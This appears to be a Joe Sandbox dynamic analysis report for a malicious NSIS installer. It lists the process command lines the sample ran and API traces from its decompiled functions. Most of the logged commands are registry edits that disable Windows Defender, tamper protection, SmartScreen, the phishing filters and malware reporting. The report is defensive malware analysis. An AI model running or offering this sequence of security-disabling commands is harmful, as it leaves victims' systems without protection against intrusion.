Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Imagebase:	0x7ff697030000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:52:55
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:52:56
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	03:52:57
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	03:52:58
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	03:52:58
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	03:52:58
Start date:	12/07/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Imagebase:	0x8f0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.5%
Total number of Nodes:	1356
Total number of Limit Nodes:	23

Executed Functions

Function 0040350F Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403532
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040355D
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403570
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403609
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403646
OleInitialize.OLE32(00000000), ref: 0040364D
SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040366C
GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403681
CharNextW.USER32(00000000,007B3000,00000020,007B3000,00000000,?,00000008,0000000A,0000000C), ref: 004036BA
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F2
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403803
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040380F
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403823
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040382B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040383C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403844
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403858
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B3000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403931

Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541

wsprintfW.USER32 ref: 0040398E
GetFileAttributesW.KERNEL32(007AB800,C:\Users\user\AppData\Local\Temp\), ref: 004039C1
DeleteFileW.KERNEL32(007AB800), ref: 004039CD
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039FB

Part of subcall function 004062F4: MoveFileExW.KERNELBASE(?,?,00000005,00405DF2,?,00000000,000000F1,?,?,?,?,?), ref: 004062FE

CopyFileW.KERNEL32(C:\Users\user\Desktop\3Dut8dFCwD.exe,007AB800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A11

Part of subcall function 00405B17: CreateProcessW.KERNEL32(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B40
Part of subcall function 00405B17: CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B4D

Part of subcall function 00406891: FindFirstFileW.KERNELBASE(75923420,007A4798,007A3F50,00405F54,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040689C
Part of subcall function 00406891: FindClose.KERNEL32(00000000), ref: 004068A8

ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A5A
OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A5F
ExitProcess.KERNEL32 ref: 00403A7C
CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,007AB800,00000000), ref: 00403A83
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A9F
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ABB
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ADE
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B03
ExitProcess.KERNEL32 ref: 00403B26

Part of subcall function 00405AE2: CreateDirectoryW.KERNELBASE(?,00000000,00403502,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405AE8

Strings

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp, xrefs: 00403904
Low, xrefs: 00403825
C:\Users\user\AppData\Local\Temp\, xrefs: 004037E7, 004037EC, 00403802, 0040380E, 0040381D, 0040382A, 00403836, 0040383E, 0040392C, 004039AD, 004039D9, 004039FA, 00403A03
TMP, xrefs: 0040383F
Error launching installer, xrefs: 004038DA
UXTHEME, xrefs: 004035FD, 00403602, 00403608
TEMP, xrefs: 00403837
C:\Users\user\Desktop\3Dut8dFCwD.exe, xrefs: 00403A0C
C:\Users\user\Desktop, xrefs: 0040394F
1033, xrefs: 00403853
~nsu%X.tmp, xrefs: 00403985
NSIS Error, xrefs: 00403672
\Temp, xrefs: 00403809
SeShutdownPrivilege, xrefs: 00403AB5

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm4D39.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\3Dut8dFCwD.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 2017177436-3207634299
Opcode ID: 95031478cf7aca2761e13cc7a8c35f67bbb2b0b4fc0cb4fdcab670add076414d
Instruction ID: 67d79b026de4563afcf96275ffa6c79ee12181f10d5245d5b23545884d7a86e1
Opcode Fuzzy Hash: 95031478cf7aca2761e13cc7a8c35f67bbb2b0b4fc0cb4fdcab670add076414d
Instruction Fuzzy Hash: FCF1F570604301ABD720AF659D05B6B7EE8EF81B06F10443EF581B62D1DB7D8A45CB6E

Function 00405C40 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405C69
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*,\*.*), ref: 00405CB1
lstrcatW.KERNEL32(?,0040A014), ref: 00405CD4
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CDA
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CEA
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D8A
FindClose.KERNEL32(00000000), ref: 00405D99

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C4D
C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*, xrefs: 00405C99, 00405C9F, 00405CB0, 00405CE9
\*.*, xrefs: 00405CAB

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*$\*.*
API String ID: 2035342205-3418915113
Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
Instruction ID: 81bbe464494fb05f5b6ac6ef540245f59b5aaf372d852028a7707812675e6212
Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
Instruction Fuzzy Hash: 7C419230805A14B6DB216B658D4DBBF7678EF81714F10813FF841B11D1DB7C4A829E6E

Function 00406891 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(75923420,007A4798,007A3F50,00405F54,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040689C
FindClose.KERNEL32(00000000), ref: 004068A8

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
Instruction ID: e6b866c1dacf5e46d4e55f169e1c72a585861dd5ed209923aafe0abde5973ea2
Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
Instruction Fuzzy Hash: 9BD012325161205BD29127386D0C85B7A9CAF563317129B36F46AF22E0C7748C628698

Function 00403C06 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

